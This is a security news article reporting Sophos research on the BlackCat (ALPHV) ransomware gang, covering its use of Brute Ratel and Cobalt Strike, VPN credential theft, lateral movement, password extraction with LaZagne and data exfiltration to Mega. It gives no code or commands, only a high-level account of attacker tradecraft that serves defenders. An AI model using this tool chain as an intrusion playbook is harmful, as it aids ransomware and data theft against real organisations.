BlackCat adds Brute Ratel Pentest tool to attack Arsenal

Cybercrime, Cybercrime as a Service, Cyberwar/Attacks on Nation States

Gang targets big business in US, Europe and Asia

Prajeet Nair (@prajeetspeaks) •
July 16, 2022

BlackCat uses proven methods such as attacking vulnerable firewalls and VPNs (Source: ISMG)

The ransomware gang behind BlackCat ransomware has updated their arsenal by adding Brute Ratel, a pentesting tool with remote access features.

See also: On demand | Cat by the fire | Zero tolerance: control the landscape where you will meet your opponents

Sophos threat researchers claim to have been tracking this ransomware group since December 2021, after being called in to investigate at least five attacks involving this ransomware.

They observed that these attacks occur in the United States, Europe and Asia in large companies operating in different segments of the industry.

During their investigation, they discovered that the attackers were using a PowerShell command to download and execute Cobalt Strike beacons on some affected systems. However, the researchers also discovered that the attackers were using a tool called Brute Ratel, which had “Cobalt Strike-like remote access functionality”.

“What we’ve seen recently with BlackCat and other attacks is that threat actors are very effective and efficient at their jobs,” Christopher Budd, senior threat research manager at Sophos, told Information Security Media Group. It describes how they use real methods such as attacking vulnerable firewalls and VPNs because they still work, but they are also innovating to avoid security defenses, including moving to the new post-exploitation C2 framework Brute Ratel in their attacks.

The BlackCat ransomware-as-a-service group, which may be a rebrand of the DarkSide or BlackMatter ransomware groups, is also known as ALPHV. Its malware is coded with Rust, a programming language known for its fast performance and structural protections against certain types of bugs. Analysis by cybersecurity firm Varonis shows that the group is actively recruiting operators with the promise that affiliates can keep 90% of victims’ payments.

In June, BlackCat ransomware claimed the University of Pisa as a victim. The ransomware gang reportedly demanded a $4.5 million ransom after seizing the university’s computer system.

The attackers claim the ransom is a “cut price” which will increase to $5 million if not paid promptly. An Italian news site also shared a screenshot of the alleged ransom note, which contains a clock counting the minutes until the price jumps (see: BlackCat attacks the University of Pisa and demands a ransom of 4.5 million dollars).

Inquiry Details

Ransomware groups penetrate enterprise networks at scale using BlackCat, and researchers have found that ransomware exploits unpatched vulnerabilities first revealed in 2018 in firewall/VPN devices, and in at least two cases, they pivoted to internal systems after gaining a foothold from the firewall.

“In two other cases, attackers targeted another firewall vendor’s product with a vulnerability that was disclosed last year,” Sophos researchers explain.

However, in one incident, Sophos investigators discovered that the vulnerabilities allowed attackers to obtain VPN credentials from firewalls and use them to connect to the VPN as authorized users. .

“None of the targets used multi-factor authentication for these VPNs. The only outlier appears to have been a spear phishing attack that revealed an internal user’s VPN login credentials to the attackers,” says lead researcher Andrew Brandt at SophosLabs. “Once inside the network, attackers primarily used RDP to move laterally between computers, conducting brute-force attacks on the VPN connection against the administrator account on machines inside the network.”

The ransomware executable can spread laterally on Windows machines and is designed to target VMware ESXi hypervisor servers.

In another case, Sophos incident responders removed a compromised VPN account from the firewall and created a new credential combination. The researchers observed that the attackers performed the same exploit for the second time and managed to extract the newly created credential combination and they continued to attempt to encrypt the machines.

Using Remote Access Tools

After gaining a foothold in a network, attackers install various remote access utilities into a system available on the network, which gives them fallback methods to remotely connect to target networks.

Sophos investigators found that the attacker was using commercially available tools such as AnyDesk and TeamViewer and had also installed nGrok, an open-source remote access tool.

“The attackers also used PowerShell commands to download and run Cobalt Strike beacons on some machines, as well as a tool called Brute Ratel, which is a newer penetration testing suite with remote access capabilities from Cobalt Strike type,” says Brandt.

Sophos researchers discovered that the Brute Ratel binary was installed as a Windows service named wewe on an affected machine.

One of the biggest challenges for Sophos investigators was that some of the targeted organizations were running the same servers that had been compromised using the Log4j vulnerability.

In addition to ransomware on the network, threat actors collected and exfiltrated sensitive data from targets and uploaded large volumes of data to Mega, a cloud storage provider.


The attackers used a third-party tool called DirLister to create a list of accessible directories and files, or in some cases used a PowerShell script from a pentester toolkit, called PowerView.ps1, to enumerate the machines on the network, and in some cases they used a tool called LaZagne to extract passwords saved on various devices, the researchers say.

While collecting the files, the hackers used WinRAR to compress the files into .rar archives and used rsync to download the stolen data.

Sophos researchers say they found evidence the attackers broke into the network months before they began investigating the case. They also saw that the attackers installed “cryptomining software on 16 servers inside the company’s network in early November.”

Comments are closed.